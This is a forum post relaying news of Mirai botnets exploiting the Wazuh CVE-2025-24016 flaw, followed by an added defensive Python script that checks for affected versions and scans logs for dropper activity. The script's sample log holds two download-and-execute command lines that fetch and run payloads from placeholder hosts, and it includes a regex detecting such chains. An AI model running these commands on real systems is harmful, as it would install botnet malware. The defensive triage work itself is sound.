06-10-2025, 01:16 PM
Threat actors are actively exploiting CVE-2025-24016, a critical remote code execution vulnerability in Wazuh servers, to deploy two distinct Mirai-based botnets for distributed denial-of-service (DDoS) attacks. Akamai first identified the malicious activity in late March 2025, shortly after the public disclosure of the vulnerability and a proof-of-concept (PoC) exploit. The flaw, affecting versions 4.4.0 and later, was patched in February 2025 with version 4.9.1, but attackers continue to exploit unpatched systems.
The first botnet delivers the LZRD Mirai variant, previously observed targeting IoT devices. Infrastructure analysis uncovered additional Mirai variants, including "neon" and "vision," along with exploits targeting Hadoop YARN and various router vulnerabilities.
The second botnet deploys the Resbot variant and appears to have connections to Italian-language domains, suggesting a campaign possibly targeting Italian-speaking users. It leverages multiple exploits against Huawei, Realtek, and ZyXEL routers.
Researchers note that Mirai propagation remains persistent, with attackers frequently repurposing older exploits and incorporating newly disclosed vulnerabilities, including CVE-2024-3721.
Globally, botnet activity continues to rise, especially in the APAC region and among IoT devices, contributing to an increase in sophisticated cyberattacks. Additionally, the FBI has warned about the BADBOX 2.0 botnet, which has infected millions of devices to create proxy networks for cybercriminals.
Source: https://thehackernews.com/2025/06/botnet...ility.html
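An added triage script for administrators reading the post above (example code, not Akamai's, Wazuh's or the article's own). It does two things: it decides whether a Wazuh server version falls in the range the post describes (4.4.0 up to the fix in 4.9.1), and it scans request log lines for the download-and-execute chain that Mirai droppers typically run after a successful exploit. The `wazuh-control info` output format, the log lines and the dropper pattern are all assumptions constructed for the example, not indicators taken from the post.

```python
"""Triage helper for CVE-2025-24016 (Wazuh server RCE) exposure.

Added example, not code from Akamai, Wazuh or The Hacker News.
Check 1: is the installed Wazuh server version inside the affected range?
         The post gives 4.4.0 as the first affected version and 4.9.1 as the fix.
Check 2: do request log lines carry a Mirai-style download-and-execute chain?
         The pattern is an assumption about typical droppers, not from the post.
"""
import re
from typing import Dict, Iterable, List, Optional, Tuple

FIRST_AFFECTED = (4, 4, 0)   # first vulnerable release named in the post
FIXED = (4, 9, 1)            # release that shipped the fix


def parse_version(text: str) -> Optional[Tuple[int, int, int]]:
    """Extract a dotted version such as 'v4.8.2' or '4.9.1' as an int tuple."""
    m = re.search(r"v?(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        return None
    major, minor, patch = (int(x) for x in m.groups())
    return (major, minor, patch)


def is_vulnerable_version(version: str) -> bool:
    """True when FIRST_AFFECTED <= version < FIXED (tuple comparison)."""
    v = parse_version(version)
    if v is None:
        raise ValueError(f"unrecognised version string: {version!r}")
    return FIRST_AFFECTED <= v < FIXED


def version_from_control_info(output: str) -> Optional[str]:
    """Pull WAZUH_VERSION out of `wazuh-control info` style output.

    Assumed format (not from the post): one KEY="value" pair per line.
    """
    m = re.search(r'^WAZUH_VERSION="([^"]+)"', output, re.MULTILINE)
    return m.group(1) if m else None


# Assumed dropper shape: fetch a remote file with wget/curl, then chmod it
# or hand it to a shell. Anchored on a real URL and on whitespace after the
# tool name so that paths like /docs/wget-guide do not trip it.
DROPPER_RE = re.compile(
    r"(?:wget|curl)\s+[^;&|]*https?://[^\s;&|]+"      # fetch from remote host
    r".*?(?:chmod\s+[0-7+x]+|\bsh\s|\bbash\s|\./)",   # then make executable / run
    re.IGNORECASE,
)


def find_dropper_attempts(lines: Iterable[str]) -> List[str]:
    """Return the log lines that contain a download-and-execute chain."""
    return [line for line in lines if DROPPER_RE.search(line)]


def triage(control_info_output: str, log_lines: Iterable[str]) -> Dict[str, object]:
    """Combine both checks into one summary for an operator."""
    version = version_from_control_info(control_info_output)
    return {
        "version": version,
        "vulnerable_version": is_vulnerable_version(version) if version else None,
        "dropper_hits": find_dropper_attempts(log_lines),
    }


# Constructed sample input for the example (not real captures).
SAMPLE_CONTROL_INFO = 'WAZUH_VERSION="v4.8.2"\nWAZUH_REVISION="40823"\nWAZUH_TYPE="server"\n'
SAMPLE_LOG = [
    '10.0.0.5 - - [27/Mar/2025:10:12:03 +0000] "GET / HTTP/1.1" 200 "-"',
    '198.51.100.7 - - [27/Mar/2025:10:14:41 +0000] "POST /example HTTP/1.1" 500 '
    '"cd /tmp; wget http://198.51.100.9/x.sh; chmod 777 x.sh; sh x.sh"',
    '10.0.0.5 - - [27/Mar/2025:10:15:02 +0000] "GET /docs/wget-guide HTTP/1.1" 200 "-"',
    '203.0.113.4 - - [27/Mar/2025:10:16:19 +0000] "POST /example HTTP/1.1" 500 '
    '"curl -s http://203.0.113.4/bins/arm7 -o /tmp/a; chmod +x /tmp/a; /tmp/a"',
]

if __name__ == "__main__":
    summary = triage(SAMPLE_CONTROL_INFO, SAMPLE_LOG)
    print(f"Wazuh version: {summary['version']}  vulnerable: {summary['vulnerable_version']}")
    for hit in summary["dropper_hits"]:
        print("possible dropper:", hit)
```

The version check is the decisive one: a server at 4.9.1 or later is outside the affected range regardless of what the logs show, while a server inside the range should be treated as exposed even with no hits, since the log pattern only catches one common post-exploitation shape and an attacker can stage a payload differently.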